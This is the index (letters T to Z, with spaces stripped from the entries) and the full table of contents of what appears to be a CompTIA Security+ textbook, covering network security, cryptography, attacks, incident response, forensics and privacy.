inalternativeenvironments,454–457applications(programs).Seeapplications,hardeningbaselinesand,409grouppolicyand,450–452host-based.Seehosthardeningidentifyingcriticalsystemsforbusinesscontinuityplanning,586methods,457–459network-based.Seenetworkhardeningoperatingsystemsand,409–410overviewof,408preparingforincidentresponse,656preventativestepsadministratorscantake,13reviewandQ&A,460–463securitytemplatesand,452–453vulnerabilities,627
systemproblemreport(SPR),643systematicrisks,611SystemsNetworkArchitecture(SNA),224
Ttabletcomputer,theftof,201tabletopexercises,preparingfordisasterrecovery,590TACAS+(TerminalAccessControllerAccessControlSystem+)
remoteaccessmethods,314–317remoteaccessvulnerabilities,329–330
tailgating(piggybacking),poorsecuritypractices,80tangibleimpacts,impactdeterminationandquantification,617tape,typesofmagneticmedia,278–279targets,specificandopportunistic,12Tavares,Stafford,105–106
TAXII(TrustedAutomatedeXchangeofIndicatorInformation),669–670TCO(totalcostofownership),626TCP/IPhijacking
overviewof,482sequencenumbersand,482
TCP/IP(TransmissionControlProtocol/InternetProtocol)importanceof,227overviewof,224traceswithWireshark,403
TCP(TransmissionControlProtocol)ISAKMPimplementationontransportlayer,175packetflags,229portscanners,444resetmessage,387three-wayhandshake,228–229vs.UDP,227–229
TCPwrappershost-basedfirewallsinLinuxOSs,435–436overviewof,459protectingUNIXOSs,419
teams,incidentresponse,651–652,656–658technologyrisks,613–614telecommunications
hacksonphonesystem,266mobilephones.Seemobiledevices
telephony,266Telnet
bannergrabbing,404managingrouters,259managingswitches,258remoteaccessvia,321
softwareupdatesand,442TEMPESTprogram,DoD(DepartmentofDefense),66–67,209templates,securitytemplates,452–453TemporalKeyIntegrityProtocol(TKIP),354–355TerminalAccessControllerAccessControlSystem+(TACAS+)
remoteaccessmethods,314–317remoteaccessvulnerabilities,329–330
terrorists,typesofthreats,10–11tests
changemanagement,635disasterrecovery,589–590softwaredevelopment,567–568
theftdevicetheft,203–204DLP(datalossprevention),304oflaptopsandtablets,201mitigationstrategies,615
third-partytrustmodel,130threats
actors,610advancedpersistentthreats.SeeAPTs(advancedpersistentthreats)alerts,57–58assessinginriskmanagementmodel,616–617certificate-based,160–161CompTIASecurity+ExamObjectives,745–749criminalorganizations,10current,4–7defined,610insiders,9–10intruders,9modeling,560–561
nation-states,terrorists,andinformationwarfare,10–11probability/likelihood,628sourcesortypesof,7vectors,610,627–628virusesandworms,8
three-wayhandshake,TCP,228–229Time-basedOne-TimePassword(TOTP),292timebomb,471timestampauthority(TSA),nonrepudiationservices,136TKIP(TemporalKeyIntegrityProtocol),354–355TLSCipherSuiteRegistry,174TLSHandshakeProtocol,173–174TLSRecordProtocol,173TLS(TransportLayerSecurity)
DHprotocolusedby,110inEAP-TLS,357handshake,533howSSL/TLSworks,532–536HTTPSusing,182interactingwithPKIandcertificates,173–174overviewof,531–532SSL/TLSfunctionsforLDAPservices,539–540STARTTLSmethod,505usinginplaceofSSL,533vulnerabilities,541WTLSbasedon,340
TMS(TransportManagementSystem),640TokenRing,224tokens
foraccess.Seeaccesstokensasauthenticationfactor,296–297
inchallenge/responseprocess,310tools
computerforensics,682NIDSs(network-basedIDSs),387–388riskmanagement,625–626steganography,115usedinattacks,496–497
tools,IDSsactivevs.passive,402–403bannergrabbers,403–404portscanners,400–402protocolanalyzers,398–399SPAN(SwitchedPortAnalyzer),400
topsecretinformation,classificationof,46topologies,network,222–223totalcostofownership(TCO),626TotalTestersoftwareforexampractice,756–757TOTP(Time-basedOne-TimePassword,292TPM(TrustedPlatformModule)
creatingandstoringencryptionkeys,194hardwareencryptiondevices,438inkeymanagement,98
trafficcollectorinHIDSs,389inIDSs,378inNIDSs,383
trainingmetricsandcompliance,58programsfor,85role-based,55–56securityawareness,54–55
securitypoliciesandprocedures,55transitiveaccess,attacksviolatingtrustrelationshipbetweenmachines,484
transitivetrusts,mobileapplicationsecurity,372transportencryption,120TransportLayerSecurity.SeeTLS(TransportLayerSecurity)TransportManagementSystem(TMS),640transportmode,IPsec,182–183transpositioncipher,92–94trapdoors
inasymmetricencryption,109overviewof,472–473
trapping,antispamproducts,431trends(security-related)
alertsand,57–58overviewof,11–12
TrillianIMclient,523TripleDES(3DES).See3DES(TripleDES)Tripwire
hashvaluesusedindetectingintrusion,411passivetools,402
Trojanhorses,470trust
certificateverificationand,143–146hierarchicaltrustmodel,155–157hybridtrustmodel,159–160mobileapplicationsecurityand,372peer-to-peertrustmodel,158–159
trustanchors,155–156trustdomains,154–155TRUSTe,onPII,718
TrustedAutomatedeXchangeofIndicatorInformation(TAXII),669–670TrustedOSs,434–435TrustedPlatformModule.SeeTPM(TrustedPlatformModule)trustedrelationships,spoofingattacks,481TSA(timestampauthority),nonrepudiationservices,136tunneling
authenticationprotocols,317–318IPsectunnelmode,182–183L2TP(Layer2TunnelingProtocol),320–321overviewof,246–247PPP(Point-to-PointProtocol),317–318
tunnelingproxies,270twistedpaircable,UTP/STP,274–275Twitter,sharingtoomuchinformation,57Twofish,107typosquatting,client-sideattacks,494
UUDIs(unconstraineddataitems),inClark-Wilsonsecuritymodel,37UDP(UserDatagaramProtocol)
ISAKMPimplementationontransportlayer,175portscanners,444vs.TCP,227–229
UEFI(UnifiedExtensibleFirmwareInterface)hardeningWindowsServer2012,414physicalsecurityand,200–201
UMTS(UniversalMobileTelecommunicationsSystem),342unconstraineddataitems(UDIs),inClark-Wilsonsecuritymodel,37unerasetools,forcomputerforensics,682unguidedmedia
IR(infrared),276overviewof,276RF(radiofrequency),277
Unicode,569–570UnifiedExtensibleFirmwareInterface(UEFI)
hardeningWindowsServer2012,414physicalsecurityand,200–201
unifiedthreatmanagement(UTM),272–273UniformResourceLocator(URL),530uninterruptiblepowersupply.SeeUPS(uninterruptiblepowersupply)UniversalMobileTelecommunicationsSystem(UMTS),342UniversalSerialBus(USB)
devices.SeeUSBdevicesencryption,438tokens,296
UNIXOSsbaselines,417DAC(discretionaryaccesscontrol),302filepermissions,302hardeningUNIX,418–419MacOSXbasedon,421–422
unshieldedtwistedpair(UTP)cable,274–275unsolicitedcommerciale-mail.Seealsospam,514unstructuredthreats,9unsystematicrisks,611unusedfeatures,disablingformobiledevicesecurity,366updates
antivirusproducts,428applications,426malwaredefenses,473manual,458
software,426,442upgrades,comparedwithpatches,445UPS(uninterruptiblepowersupply)
inphysicalsecurity,64protectingagainstshort-termpowerfailure,208utilityandpowerinterruptionsand,598
URLfilters,blockingprohibitedwebsites,273URLhijacking,client-sideattacks,494URL(UniformResourceLocator),530USAPatriotAct,702USBdevices
bootdiskattacksusingflashdrives,192–194physicalsecurityand,201possiblesourcesofforensicinformationon,687typesofelectronicmedia,280–281
USBtokens,296USB(UniversalSerialBus),encryption,438usecases,intestingphaseofsoftwaredevelopment,567useracceptance,BYODconcerns,369UserAccountControl,hardeningWindowsOSs,413UserDatagramProtocol.SeeUDP(UserDatagaramProtocol)userIDs
identificationin,305–306sessionmanagementand,22SSO(singlesign-on),294–295vs.usernames,289
userinterface,inIDSs,379userrights.Seerightsusernames,289users/useraccounts
auditingaccess,498
auditingaccounts,290authentication,289–291controllingwithAppLocker,434identificationin,305–306privacy,732–733privilegemanagement,288–289reviewingrightsandpermissionsasriskmitigationstrategy,615securitytemplates,453specialaccounts,290userhabits,56–57
UTF-8,570UTM(unifiedthreatmanagement),272–273UTP(unshieldedtwistedpair)cable,274–275
Vvacations,humanresourcespolicies,49–50validateservice,XKMS,177validation
input/outputvalidation,568–571server-sidevs.client-sidevalidation,579–580
vanEckphenomenon,66,209vehicles,hardeningin-vehiclecomputingsystems,457ventilation.SeeHVAC(heating,ventilation,andairconditioning)Verizon,DataBreachInvestigationsReport,12versioncontrol,635VideoPrivacyProtectionAct(VPPA),722–723videosurveillance,physicalaccesscontrols,62Vigenèrecipher,95–96virtualLANs.SeeVLANs(virtualLANs)virtualmachines(VMs),254–255
virtualprivatenetworks.SeeVPNs(virtualprivatenetworks)virtualization
benefitsof,254–255risksassociatedwith,629
virusesalertsregardingnewthreatsandsecuritytrends,57armoredviruses,468avoidinginfection,468BYODconcerns,367e-mailmalware,510–513historicalsecurityincidents,2–3overviewof,466–467speedofproliferation,3typesof,8,467–468
vishingattacksoverviewof,485socialengineeringattacks,76
VLANs(virtualLANs)managing,443networkarchitectures,222overviewof,244–245securityimplicationsof,245trunking,245
VMs(virtualmachines),254–255VoIP(VoiceoverIP)
4Gmobilenetworks,343PBXand,266securityperimeterand,60–61vishingattacks,76
VPNs(virtualprivatenetworks)GroupPolicyprovidingVPNcompatibility,451
overviewof,323–324PPTPand,318–319tunneling,246–247VPNconcentrator,266–267
VPPA(VideoPrivacyProtectionAct),722–723vulnerabilities
application,474application-levelattacks,572assessment,43bugtracking,571–572CompTIASecurity+ExamObjectives,745–749defined,610eliminating,465minimizingavenuesofattack,465–466nullsessions(WindowsOSs),478patchesand,4reducingincode,563remoteaccess,329–330researching,656system,627turningoffunneededservices,411,417WAP,341webapplication,552–553webcomponent,541zero-day,577
vulnerabilityscanners,413,448–450
WW3C(WorldWideWebConsortium),176–178walls,inphysicalsecurity,195
WANs(wideareanetworks),221WAPgap,341WAP(WirelessApplicationProtocol)
demandfordataservicesand,339mobiledataapplications,337vulnerabilityinWAPaggregation,341WTLSand,340
WAPs(wirelessaccesspoints),60,264–265war-chalkingattacks,351war-dialingattacks
IEEE802.11attacksand,351overviewof,477
war-drivingattacksdealingwithunauthorizedaccess,283IEEE802.11attacksand,351overviewof,477–478
war-flyingattacks,351war-walkingattacks,351warmsites,alternativebackupsites,597WASC(WebApplicationSecurityConsortium),553WassenaarArrangement,705–706water-basedfiresuppressionsystems,205waterfallmodel,softwaredevelopment,559wateringholeattacks,client-sideattacks,495weakkeys
attacksonencryption,486–487inDES,104keystretching,119
Web2.0security,554webapplicationfirewalls,264WebApplicationSecurityConsortium(WASC),553
webbrowsers.Seebrowserswebcomponents
ActiveX,545–546applicationvulnerabilitiesand,552–553browserplug-ins,550–551buffer-overflowattacks,542CGI(CommonGatewayInterface),546client-sideattacks,554code-basedvulnerabilities,541–542concerns,531cookies,547–550DAPandLDAPfordirectoryservices,539–540FTPandSFTPforfiletransfer,540–541HTTPandHTTPSfordatatransfer,537–539Java,542–543JavaScript,544–545maliciousadd-ons,551overviewof,530–531reviewandQ&A,555–557securingbrowsers,546server-sidescripts,547sessionhijackingattacks,553signedapplets,551–552SSLandTLSprotocolsforencryption,531–536vulnerabilities,541Web2.0security,554
webprivacycookiesand,732overviewof,731–732
webprotocolsDAPandLDAPfordirectoryservices,539–540
FTPandSFTPforfiletransfer,540–541HTTPandHTTPSfordatatransfer,537–539SSLandTLSforencryption,531–536
webproxies,271websecuritygateways,271websites
blockingprohibitedsites,273phishingattacksvia,75
Websitedefacementincident,3weight-basedsystem,antivirusproducts,428WEP(WiredEquivalentPrivacy)
confidentiality,350dynamickeygeneration,357–358IEEE802.11attacksand,353–354toolsforcrackingWEPkeys,352
WEPCrack,352whalingattacks,75white-boxtesting,insoftwaredevelopment,567white-hathacking,497whitelistingapplications,434Wi-FiProtectedAccess.SeeWPA(Wi-FiProtectedAccess)Wi-FiProtectedSetup(WPS),355wideareanetworks(WANs),221WiMAXband,337WindowsDefender
hosthardening,431–432OShardening,413
WindowsFirewall,413,436WindowsMail,519–520WindowsOSs
DAC(discretionaryaccesscontrol),302
disablingautoplay,202findingMACaddresses,233–234GroupPolicy,32–33,450–452groups,291hostforensics,687–688hosthardening,413–417NAP(NetworkAccessProtection),267–268patches,426privilegesoruserrights,298–300securitycontrolsandpermissions,297–298securitytemplates,453
WindowsServer2008,hardening,413–414WindowsServer2012,hardening,414–415WindowsServerUpdateServices(WSUS),447–448WindowsUpdateutility,424–426WindowsVista/7
AutomaticUpdates,424–426filesystemencryption,123hardening,413
wirespeed,cable,395WiredEquivalentPrivacy.SeeWEP(WiredEquivalentPrivacy)wirelessaccesspoints(WAPs),60,264–265WirelessApplicationProtocol.SeeWAP(WirelessApplicationProtocol)wirelessLANs(WLANs),337wirelessnetworks
captiveportalshandlingauthenticationon,362introductionto,337–338mesharchitecture,223securityissues,65–66wirelessprotocols,312
wirelesssecurity
3Gmobilenetworks,3424Gmobilenetworks,343attackersconnectingtonetworkviawirelessbridges,192Bluetoothand,343–345Bluetoothattacks,345–346IEEE802.11and,347–350IEEE802.11attacks,350–354introductiontowirelessnetworks,337–338methods,354–355,357–359mobilephones,338–340NFC(nearfieldcommunication),347reviewandQ&A,373–375settingupWPA2,355–357WAP(WirelessApplicationProtocol),340–341wirelessdevicesand,264–265
wirelesssystems,configuringantennaplacement,360–361antennatypes,359–360captiveportals,362overviewof,359powerlevels,361securingpublicWi-Fi,362sitesurveys,361–362
WirelessTransportLayerSecurity(WTLS),184,340–341Wireshark
opensourceprotocolanalyzer,399sniffersusedinattacksonIEEE8082.11,352TCP/IPtraces,403
WLANs(wirelessLANs),337WorcesterAirportincident,2workstations
antivirussoftwarefor,429–430forensicworkstation,681infrastructuresecurity,253securing,412
WorldWideWebConsortium(W3C),176–178WorldWideWeb(WWW),242worms
e-mailmalware,510,512examplesofandprotectionagainst,469historicalsecurityincidents,2–4Qakbotworm,662typesofthreats,8
WPA(Wi-FiProtectedAccess)overviewof,354–355settingupWPA2,355–357WPA2(Wi-FiProtectedAccess2),355
WPS(Wi-FiProtectedSetup),355wrappers.SeeTCPwrapperswriteblockers,inforensicinvestigation,683WSUS(WindowsServerUpdateServices),447–448WTLS(WirelessTransportLayerSecurity),184,340–341WWW(WorldWideWeb),242
XX.25Aprotocol,224X.500standard
coveringcertificatesusedforauthentication,172fordirectoryservices,539distinguishednames,144
X.509standard
fordigitalcertificates,134overviewof,172PKC(PublicKeyCertificate),168useswithTLS,357
XACML(eXtensibleAccessControlMarkupLanguage),304XKMS(XMLKeyManagementSpecification),176–178XMASattack,486XMLinjectionattacks,574XMLKeyManagementSpecification(XKMS),176–178XOR(eXclusiveOR),useincryptography,97XSRF(cross-siterequestforgery)
inputvalidationand,569overviewof,576–577
XSS(cross-sitescripting)attacksinputvalidationand,569overviewof,572–573
YYagiantennas,360
ZZenmapportscanner,402zero-dayvulnerabilities,577ZigBeewirelessbands,337Zimmermann,Philip,122zombies,inDDoSattacks,476ZoneAlarm,fromCheckPointSoftwareTechnologies,436zones,innetworkcontrolsystems,246zones,security.Seesecurityzones
- Title Page
- Copyright
- About the Authors
- Acknowledgments
- Contents at a Glance
- Contents
- Foreword
- Preface
- Introduction
- Instructor Web Site
- Chapter 1 Introduction and Security Trends
- The Computer Security Problem
- Definition of Computer Security
- Historical Security Incidents
- The Current Threat Environment
- Threats to Security
- Security Trends
- Targets and Attacks
- Specific Target
- Opportunistic Target
- Minimizing Possible Avenues of Attack
- Approaches to Computer Security
- Ethics
- Additional References
- Chapter 1 Review
- Chapter 2 General Security Concepts
- Basic Security Terminology
- Security Basics
- Security Tenets
- Security Approaches
- Security Principles
- Access Control
- Authentication Mechanisms
- Authentication and Access Control Policies
- Security Models
- Confidentiality Models
- Integrity Models
- Chapter 2 Review
- Chapter 3 Operational and Organizational Security
- Policies, Procedures, Standards, and Guidelines
- Security Policies
- Change Management Policy
- Data Policies
- Human Resources Policies
- Due Care and Due Diligence
- Due Process
- Incident Response Policies and Procedures
- Security Awareness and Training
- Security Policy Training and Procedures
- Role-Based Training
- Compliance with Laws, Best Practices, and Standards
- User Habits
- New Threats and Security Trends/Alerts
- Training Metrics and Compliance
- Interoperability Agreements
- Service Level Agreements
- Business Partnership Agreement
- Memorandum of Understanding
- Interconnection Security Agreement
- The Security Perimeter
- Physical Security
- Physical Access Controls
- Physical Barriers
- Environmental Issues
- Fire Suppression
- Wireless
- Electromagnetic Eavesdropping
- Modern Eavesdropping
- Chapter 3 Review
- Chapter 4 The Role of People in Security
- People—A Security Problem
- Social Engineering
- Poor Security Practices
- People as a Security Tool
- Security Awareness
- Security Policy Training and Procedures
- Chapter 4 Review
- Chapter 5 Cryptography
- Cryptography in Practice
- Fundamental Methods
- Comparative Strengths and Performance of Algorithms
- Historical Perspectives
- Substitution Ciphers
- One-Time Pads
- Algorithms
- Key Management
- Random Numbers
- Hashing Functions
- SHA
- RIPEMD
- Message Digest
- Hashing Summary
- Symmetric Encryption
- DES
- 3DES
- AES
- CAST
- RC
- Blowfish
- Twofish
- IDEA
- Block vs. Stream
- Symmetric Encryption Summary
- Asymmetric Encryption
- Diffie-Hellman
- RSA
- ElGamal
- ECC
- Asymmetric Encryption Summary
- Symmetric vs. Asymmetric
- Quantum Cryptography
- Steganography
- Cryptography Algorithm Use
- Confidentiality
- Integrity
- Authentication
- Nonrepudiation
- Cipher Suites
- Key Exchange
- Key Escrow
- Session Keys
- Ephemeral Keys
- Key Stretching
- Secrecy Principles
- Transport Encryption
- Digital Signatures
- Digital Rights Management
- Cryptographic Applications
- Use of Proven Technologies
- Chapter 5 Review
- Chapter 6 Public Key Infrastructure
- The Basics of Public Key Infrastructures
- Certificate Authorities
- Registration Authorities
- Local Registration Authorities
- Digital Certificates
- Certificate Extensions
- Certificate Attributes
- Certificate Lifecycles
- Registration and Generation
- CSR
- Renewal
- Suspension
- Revocation
- Key Destruction
- Certificate Repositories
- Trust and Certificate Verification
- Centralized and Decentralized Infrastructures
- Hardware Security Modules
- Private Key Protection
- Key Recovery
- Key Escrow
- Public Certificate Authorities
- In-House Certificate Authorities
- Choosing Between a Public CA and an In-House CA
- Outsourced Certificate Authorities
- Tying Different PKIs Together
- Trust Models
- Certificate-Based Threats
- Stolen Certificates
- Chapter 6 Review
- Chapter 7 PKI Standards and Protocols
- PKIX and PKCS
- PKIX Standards
- PKCS
- Why You Need to Know the PKIX and PKCS Standards
- X.509
- SSL/TLS
- Cipher Suites
- ISAKMP
- CMP
- XKMS
- S/MIME
- IETF S/MIME History
- IETF S/MIME v3 Specifications
- PGP
- How PGP Works
- HTTPS
- IPsec
- CEP
- Other Standards
- FIPS
- Common Criteria
- WTLS
- ISO/IEC 27002 (Formerly ISO 17799)
- SAML
- Chapter 7 Review
- Chapter 8 Physical Security
- The Security Problem
- Physical Security Safeguards
- Walls and Guards
- Physical Access Controls and Monitoring
- Convergence
- Policies and Procedures
- Environmental Controls
- Fire Suppression
- Water-Based Fire Suppression Systems
- Halon-Based Fire Suppression Systems
- Clean-Agent Fire Suppression Systems
- Handheld Fire Extinguishers
- Fire Detection Devices
- Power Protection
- UPS
- Backup Power and Cable Shielding
- Electromagnetic Interference
- Electronic Access Control Systems
- Access Tokens
- Chapter 8 Review
- Chapter 9 Network Fundamentals
- Network Architectures
- Network Topology
- Network Protocols
- Protocols
- Packets
- Internet Protocol
- IP Packets
- TCP vs. UDP
- ICMP
- IPv4 vs. IPv6
- Packet Delivery
- Ethernet
- Local Packet Delivery
- Remote Packet Delivery
- IP Addresses and Subnetting
- Network Address Translation
- Security Zones
- DMZ
- Internet
- Intranet
- Extranet
- Flat Networks
- Enclaves
- VLANs
- Zones and Conduits
- Tunneling
- Storage Area Networks
- iSCSI
- Fibre Channel
- FCoE
- Chapter 9 Review
- Chapter 10 Infrastructure Security
- Devices
- Workstations
- Servers
- Virtualization
- Mobile Devices
- Device Security, Common Concerns
- Network Attached Storage
- Removable Storage
- Networking
- Network Interface Cards
- Hubs
- Bridges
- Switches
- Routers
- Firewalls
- How Do Firewalls Work?
- Next-Generation Firewalls
- Web Application Firewalls vs. Network Firewalls
- Concentrators
- Wireless Devices
- Modems
- Telephony
- VPN Concentrator
- Security Devices
- Intrusion Detection Systems
- Network Access Control
- Network Monitoring/Diagnostic
- Load Balancers
- Proxies
- Web Security Gateways
- Internet Content Filters
- Data Loss Prevention
- Unified Threat Management
- Media
- Coaxial Cable
- UTP/STP
- Fiber
- Unguided Media
- Removable Media
- Magnetic Media
- Optical Media
- Electronic Media
- Security Concerns for Transmission Media
- Physical Security Concerns
- Cloud Computing
- Private
- Public
- Hybrid
- Community
- Software as a Service
- Platform as a Service
- Infrastructure as a Service
- Chapter 10 Review
- Chapter 11 Authentication and Remote Access
- User, Group, and Role Management
- User
- Group
- Role
- Password Policies
- Domain Password Policy
- Single Sign-On
- Time of Day Restrictions
- Tokens
- Account and Password Expiration
- Security Controls and Permissions
- Access Control Lists
- Mandatory Access Control (MAC)
- Discretionary Access Control (DAC)
- Role-Based Access Control (RBAC)
- Rule-Based Access Control
- Attribute Based Access Control (ABAC)
- Account Expiration
- Preventing Data Loss or Theft
- The Remote Access Process
- Identification
- Authentication
- Authorization
- Access Control
- Remote Access Methods
- IEEE 802.1X
- RADIUS
- TACACS+
- Authentication Protocols
- FTP/FTPS/SFTP
- VPNs
- IPsec
- Vulnerabilities of Remote Access Methods
- Connection Summary
- Chapter 11 Review
- Chapter 12 Wireless Security and Mobile Devices
- Introduction to Wireless Networking
- Mobile Phones
- Wireless Application Protocol
- 3G Mobile Networks
- 4G Mobile Networks
- Bluetooth
- Bluetooth Attacks
- Near Field Communication
- IEEE 802.11 Series
- 802.11: Individual Standards
- Attacking 802.11
- Current Security Methods
- Wireless Systems Configuration
- Antenna Types
- Antenna Placement
- Power Level Controls
- Site Surveys
- Captive Portals
- Securing Public Wi-Fi
- Mobile Devices
- Mobile Device Security
- BYOD Concerns
- Location Services
- Mobile Application Security
- Chapter 12 Review
- Chapter 13 Intrusion Detection Systems and Network Security
- History of Intrusion Detection Systems
- IDS Overview
- IDS Models
- Signatures
- False Positives and False Negatives
- Network-Based IDSs
- Advantages of a NIDS
- Disadvantages of a NIDS
- Active vs. Passive NIDSs
- NIDS Tools
- Host-Based IDSs
- Advantages of HIDSs
- Disadvantages of HIDSs
- Active vs. Passive HIDSs
- Resurgence and Advancement of HIDSs
- Intrusion Prevention Systems
- Honeypots and Honeynets
- Tools
- Protocol Analyzer
- Switched Port Analyzer
- Port Scanner
- Passive vs. Active Tools
- Banner Grabbing
- Chapter 13 Review
- Chapter 14 System Hardening and Baselines
- Overview of Baselines
- Operating System and Network Operating System Hardening
- OS Security
- Host Security
- Machine Hardening
- Operating System Security and Settings
- OS Hardening
- Hardening Microsoft Operating Systems
- Hardening UNIX- or Linux-Based Operating Systems
- Updates (a.k.a. Hotfixes, Service Packs, and Patches)
- Antimalware
- White Listing vs. Black Listing Applications
- Trusted OS
- Host-based Firewalls
- Hardware Security
- Host Software Baselining
- Host-Based Security Controls
- Hardware-Based Encryption Devices
- Data Encryption
- Data Security
- Handling Big Data
- Cloud Storage
- Storage Area Network
- Permissions/ACL
- Network Hardening
- Software Updates
- Device Configuration
- Securing Management Interfaces
- VLAN Management
- IPv4 vs. IPv6
- Application Hardening
- Application Configuration Baseline
- Application Patches
- Patch Management
- Host Software Baselining
- Group Policies
- Security Templates
- Alternative Environments
- SCADA
- Embedded Systems
- Phones and Mobile Devices
- Mainframe
- Game Consoles
- In-Vehicle Computing Systems
- Alternative Environment Methods
- Network Segmentation
- Security Layers
- Application Firewalls
- Manual Updates
- Firmware Version Control
- Wrappers
- Control Redundancy and Diversity
- Chapter 14 Review
- Chapter 15 Types of Attacks and Malicious Software
- Avenues of Attack
- Minimizing Possible Avenues of Attack
- Malicious Code
- Viruses
- Worms
- Polymorphic Malware
- Trojan Horses
- Rootkits
- Logic Bombs
- Spyware
- Adware
- Botnets
- Backdoors and Trapdoors
- Ransomware
- Malware Defenses
- Attacking Computer Systems and Networks
- Denial-of-Service Attacks
- Social Engineering
- Null Sessions
- Sniffing
- Spoofing
- TCP/IP Hijacking
- Man-in-the-Middle Attacks
- Replay Attacks
- Transitive Access
- Spam
- Spim
- Phishing
- Spear Phishing
- Vishing
- Pharming
- Scanning Attacks
- Attacks on Encryption
- Address System Attacks
- Cache Poisoning
- Password Guessing
- Pass-the-Hash Attacks
- Software Exploitation
- Client-Side Attacks
- Advanced Persistent Threat
- Remote Access Trojans
- Tools
- Metasploit
- BackTrack/Kali
- Social-Engineering Toolkit
- Cobalt Strike
- Core Impact
- Burp Suite
- Auditing
- Perform Routine Audits
- Chapter 15 Review
- Chapter 16 E-Mail and Instant Messaging
- How E-Mail Works
- E-Mail Structure
- MIME
- Security of E-Mail
- Malicious Code
- Hoax E-Mails
- Unsolicited Commercial E-Mail (Spam)
- Sender ID Framework
- DomainKeys Identified Mail
- Mail Encryption
- S/MIME
- PGP
- Instant Messaging
- Modern Instant Messaging Systems
- Chapter 16 Review
- Chapter 17 Web Components
- Current Web Components and Concerns
- Web Protocols
- Encryption (SSL and TLS)
- The Web (HTTP and HTTPS)
- HTTPS Everywhere
- HTTP Strict Transport Security
- Directory Services (DAP and LDAP)
- File Transfer (FTP and SFTP)
- Vulnerabilities
- Code-Based Vulnerabilities
- Buffer Overflows
- Java
- JavaScript
- ActiveX
- Securing the Browser
- CGI
- Server-Side Scripts
- Cookies
- Browser Plug-ins
- Malicious Add-ons
- Signed Applets
- Application-Based Weaknesses
- Session Hijacking
- Client-Side Attacks
- Web 2.0 and Security
- Chapter 17 Review
- Chapter 18 Secure Software Development
- The Software Engineering Process
- Process Models
- Secure Development Lifecycle
- Secure Coding Concepts
- Error and Exception Handling
- Input and Output Validation
- Fuzzing
- Bug Tracking
- Application Attacks
- Cross-Site Scripting
- Injections
- Directory Traversal/Command Injection
- Buffer Overflow
- Integer Overflow
- Cross-Site Request Forgery
- Zero-Day
- Attachments
- Locally Shared Objects
- Client-Side Attacks
- Arbitrary/Remote Code Execution
- Open Vulnerability and Assessment Language
- Application Hardening
- Application Configuration Baseline
- Application Patch Management
- NoSQL Databases vs. SQL Databases
- Server-Side vs. Client-Side Validation
- Chapter 18 Review
- Chapter 19 Business Continuity and Disaster Recovery, and Organizational Policies
- Business Continuity
- Business Continuity Plans
- Business Impact Analysis
- Identification of Critical Systems and Components
- Removing Single Points of Failure
- Risk Assessment
- Succession Planning
- Continuity of Operations
- Disaster Recovery
- Disaster Recovery Plans/Process
- Categories of Business Functions
- IT Contingency Planning
- Test, Exercise, and Rehearse
- Recovery Time Objective and Recovery Point Objective
- Backups
- Alternative Sites
- Utilities
- Secure Recovery
- Cloud Computing
- High Availability and Fault Tolerance
- Failure and Recovery Timing
- Chapter 19 Review
- Chapter 20 Risk Management
- An Overview of Risk Management
- Example of Risk Management at the International Banking Level
- Risk Management Vocabulary
- What Is Risk Management?
- Risk Management Culture
- Business Risks
- Examples of Business Risks
- Examples of Technology Risks
- Risk Mitigation Strategies
- Change Management
- Incident Management
- User Rights and Permissions Reviews
- Data Loss or Theft
- Risk Management Models
- General Risk Management Model
- Software Engineering Institute Model
- NIST Risk Models
- Model Application
- Qualitatively Assessing Risk
- Quantitatively Assessing Risk
- Adding Objectivity to a Qualitative Assessment
- Risk Calculation
- Qualitative vs. Quantitative Risk Assessment
- Tools
- Cost-Effectiveness Modeling
- Risk Management Best Practices
- System Vulnerabilities
- Threat Vectors
- Probability/Threat Likelihood
- Risk-Avoidance, Transference, Acceptance, Mitigation, Deterrence
- Risks Associated with Cloud Computing and Virtualization
- Chapter 20 Review
- Chapter 21 Change Management
- Why Change Management?
- The Key Concept: Separation of Duties
- Elements of Change Management
- Implementing Change Management
- Back-out Plan
- The Purpose of a Change Control Board
- Code Integrity
- The Capability Maturity Model Integration
- Chapter 21 Review
- Chapter 22 Incident Response
- Foundations of Incident Response
- Incident Management
- Anatomy of an Attack
- Goals of Incident Response
- Incident Response Process
- Preparation
- Security Measure Implementation
- Incident Identification/Detection
- Initial Response
- Incident Isolation
- Strategy Formulation
- Investigation
- Recovery/Reconstitution Procedures
- Reporting
- Follow-up/Lessons Learned
- Standards and Best Practices
- State of Compromise
- NIST
- Department of Justice
- Indicators of Compromise
- Cyber Kill Chain
- Making Security Measurable
- Chapter 22 Review
- Chapter 23 Computer Forensics
- Evidence
- Types of Evidence
- Standards for Evidence
- Three Rules Regarding Evidence
- Forensic Process
- Acquiring Evidence
- Identifying Evidence
- Protecting Evidence
- Transporting Evidence
- Storing Evidence
- Conducting the Investigation
- Analysis
- Chain of Custody
- Message Digest and Hash
- Host Forensics
- File Systems
- Windows Metadata
- Linux Metadata
- Device Forensics
- Network Forensics
- E-Discovery
- Reference Model
- Big Data
- Cloud
- Chapter 23 Review
- Chapter 24 Legal Issues and Ethics
- Cybercrime
- Common Internet Crime Schemes
- Sources of Laws
- Computer Trespass
- Significant U.S. Laws
- Payment Card Industry Data Security Standard (PCI DSS)
- Import/Export Encryption Restrictions
- Non-U.S. Laws
- Digital Signature Laws
- Digital Rights Management
- Ethics
- Chapter 24 Review
- Chapter 25 Privacy
- Personally Identifiable Information (PII)
- Sensitive PII
- Notice, Choice, and Consent
- U.S. Privacy Laws
- Privacy Act of 1974
- Freedom of Information Act (FOIA)
- Family Education Records and Privacy Act (FERPA)
- U.S. Computer Fraud and Abuse Act (CFAA)
- U.S. Children’s Online Privacy Protection Act (COPPA)
- Video Privacy Protection Act (VPPA)
- Health Insurance Portability & Accountability Act (HIPAA)
- Gramm-Leach-Bliley Act (GLBA)
- California Senate Bill 1386 (SB 1386)
- U.S. Banking Rules and Regulations
- Payment Card Industry Data Security Standard (PCI DSS)
- Fair Credit Reporting Act (FCRA)
- Fair and Accurate Credit Transactions Act (FACTA)
- Non-Federal Privacy Concerns in the United States
- International Privacy Laws
- OECD Fair Information Practices
- European Laws
- Canadian Laws
- Asian Laws
- Privacy-Enhancing Technologies
- Privacy Policies
- Privacy Impact Assessment
- Web Privacy Issues
- Cookies
- Privacy in Practice
- User Actions
- Data Breaches
- Chapter 25 Review
- Appendix A CompTIA Security+ Exam Objectives: SY0-401
- Appendix B About the Download
- System Requirements
- Downloading Total Tester Premium Practice Exam Software
- Total Tester Premium Practice Exam Software
- Installing and Running Total Tester
- Technical Support
- Total Seminars Technical Support
- McGraw-Hill Education Content Support
- Glossary
- Index
